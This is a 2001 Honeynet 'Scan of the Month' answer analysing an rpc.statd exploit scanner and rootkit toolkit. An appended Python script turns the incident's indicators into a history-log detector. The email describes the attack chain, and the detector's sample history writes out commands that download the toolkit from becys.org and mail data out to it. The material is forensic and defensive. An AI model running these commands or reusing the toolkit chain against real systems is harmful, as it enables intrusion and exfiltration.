From marc@suse.de Sat Mar 17 20:02:38 2001
Date: Sun, 11 Mar 2001 16:15:48 +0100 (CET)
From: Marc Heuse
To: project@honeynet.org
Subject: Scan of the month

Answers for SCAN OF THE MONTH #13: March, 2001
by Marc Heuse, http://www.suse.de/~marc

Q1: What is the blackhat attempting to do with his command line syntax?

A1: He changes into the "hidden" directory /usr/sbin/.mail, downloads the file www.becys.org/LUCKROOT.TAR with lynx, unpacks it (well, having some difficulties with command line options and spelling) and then starts the front end script of his downloaded toolkit several times. The different calls of the tool are different network scans (B class scans, well, see below).

Q2: What does the tool accomplish?

A2: It scans networks for Linux systems (esp. Redhat 6.x) with vulnerable rpc.statd daemons running, exploits them and installs a rootkit.

Q3: How does the tool work?

A3: The difficulty was actually raised as the .TAR file was zipped. This 31337 protection was used to prevent the use by script kiddies. :-)

The TAR file consists of three tools, a bourne shell script and two binaries and their respective source code. The shell script is a front-end for the first of the binaries, "luckscan-a"; it compiles the two tools if they aren't yet.

"luckscan-a" (compiled on a glibc2 linux) is a class A scanner which checks for an open port. (Via additional arguments, it can also be used as a class B and C scanner.) If a port is found open, it runs "luckstatdx".

"luckstatdx" (same compilation data) is an rpc.statd exploit, written for/against Redhat 6.0 to 6.2. ("luckscan-a" only runs it in the mode against Redhat 6.2 with nfs-utils-0.1.6-2, however the offsets etc. are all the same in the other modes). If the shellcode succeeds, commands are sent to the target to show some system output and then download the file http://www.becys.org/xzibit.tar.gz with wget and install this rootkit.

Q4: Is this tool a worm, or would you classify it as something else?

A4: As it does not distribute, it's not a worm. I'd call it an exploit scanner with trojanizing function. However with some simple changes, it could be made into a worm.

Q5: Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

A5: The principle is not original, it's lived in the blackhat community for a decade now. Based on previous tools, uhh ... hmm, the luckscan-a scanner could be copied or written by themselves. I opt for the last one as the coding style in the function where the statd exploit is called is not different than in the rest of the code. Same for the front-end "luckgo". But be sure that they reuse it a lot ...

The statd exploit was written by someone else, where the blackhat seemed to remove the original author information and only kept his. The change in the statd exploit is now that some system information is printed (uname, id), and then the rootkit is downloaded and installed.

BonusQ: What information can you obtain about who is using or created the tool?

BonusA: The statd exploit reads: "statdx modify by becys" and downloads the rootkit from www.becys.org; in luckgo: "scaner-h4x0r by becys" + "BeCyS & ReSpEkT"; in luckscan-a you can find also the "h4x0r" string. So we can conclude that the guy writing (and using) that toolkit is becys and his friend respekt. (The rootkit also sends an email [mail -s "becys rewting" becys@becys.org] btw.)

Extra-Bonus-Info: Redhat's advisory states: "Although there is no known exploit for the flaw in rpc.statd Red Hat urges all users running rpc.statd to upgrade to upgrade to the new nfs-utils package." harharhar...

please keep up with this stuff, as it is really fun :-) But please make the tests harder...

Greets,
Marc

--
Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
E@mail: marc@suse.de Function: Security Research and Advisory
PGP: "lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka"
Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C
Private: http://www.suse.de/~marc SuSE: http://www.suse.de/security
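As an added example (not part of Marc's mail or the Honeynet challenge material), the following script turns the indicators named in the answers above into a simple check over a captured shell history or command audit log: a dot-directory created under a system binary path, the LUCKROOT.TAR / xzibit.tar.gz archives, downloads from becys.org, and the rootkit's "becys rewting" mail. The sample history lines are constructed for the demonstration.

```python
import re

# Indicators taken from the Scan of the Month #13 answers above.
HIDDEN_SYSDIR = re.compile(r'(?:^|\s)/(?:usr/s?bin|s?bin)/\.[^/\s]')  # e.g. /usr/sbin/.mail
TOOLKIT_FILES = ("LUCKROOT.TAR", "xzibit.tar.gz")                     # scanner kit and rootkit
DOWNLOADER = re.compile(r'\b(?:lynx|wget)\b.*becys\.org')             # fetch from the kit's host
CALLHOME = re.compile(r'\bmail\s+-s\s+"becys rewting"')               # rootkit's notification mail


def classify(line):
    """Return the list of indicator tags that one history line matches (empty if none)."""
    tags = []
    if HIDDEN_SYSDIR.search(line):
        tags.append("hidden-dir-under-system-path")
    if any(name.lower() in line.lower() for name in TOOLKIT_FILES):
        tags.append("known-toolkit-archive")
    if DOWNLOADER.search(line):
        tags.append("download-from-becys.org")
    if CALLHOME.search(line):
        tags.append("rootkit-mail-callhome")
    return tags


def scan_history(lines):
    """Return (line_number, line, tags) for every line matching at least one indicator."""
    findings = []
    for number, line in enumerate(lines, 1):
        tags = classify(line)
        if tags:
            findings.append((number, line, tags))
    return findings


# Constructed sample history, modelled on the commands described in the answers.
SAMPLE_HISTORY = [
    "cd /usr/sbin/.mail",
    "lynx -source http://www.becys.org/LUCKROOT.TAR > LUCKROOT.TAR",
    "tar -xvf LUCKROOT.TAR",
    "ls -la",
    "./luckgo",
    'mail -s "becys rewting" becys@becys.org < /tmp/info',
]

if __name__ == "__main__":
    for number, line, tags in scan_history(SAMPLE_HISTORY):
        print(f"{number}: {', '.join(tags)}  <- {line}")
```

Lines 4 and 5 of the sample are deliberately left unflagged: a plain directory listing and an unknown binary name carry no indicator on their own, so a real triage would pair this with file-system review of the hidden directory.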